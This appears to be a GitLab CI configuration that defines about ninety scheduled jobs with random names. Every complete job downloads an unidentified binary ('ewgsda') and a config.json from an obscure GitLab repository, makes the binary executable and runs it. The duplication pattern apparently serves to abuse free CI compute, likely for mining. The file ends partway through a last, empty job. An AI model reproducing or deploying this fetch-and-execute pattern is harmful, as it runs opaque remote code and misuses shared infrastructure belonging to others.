image: ubuntu:latest

before_script:
  - apt-get update -y
  - apt-get install wget unzip cgroup-tools -y

job:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ffd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

gwse:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hrswe:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hseg:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

jhedb:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

fherfc:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

asr:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hehrswe:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hsjktyg:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

aa:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ab:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ac:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ad:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ae:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hgerdd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_f:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_g:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_h:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_i:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_j:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_f:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_g:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_h:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_i:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_j:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_f:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_g:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_h:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_i:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_j:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_f:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_g:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_h:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_i:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_j:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_a:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_b:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_c:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_d:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_e:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_f:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_g:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_h:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_i:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
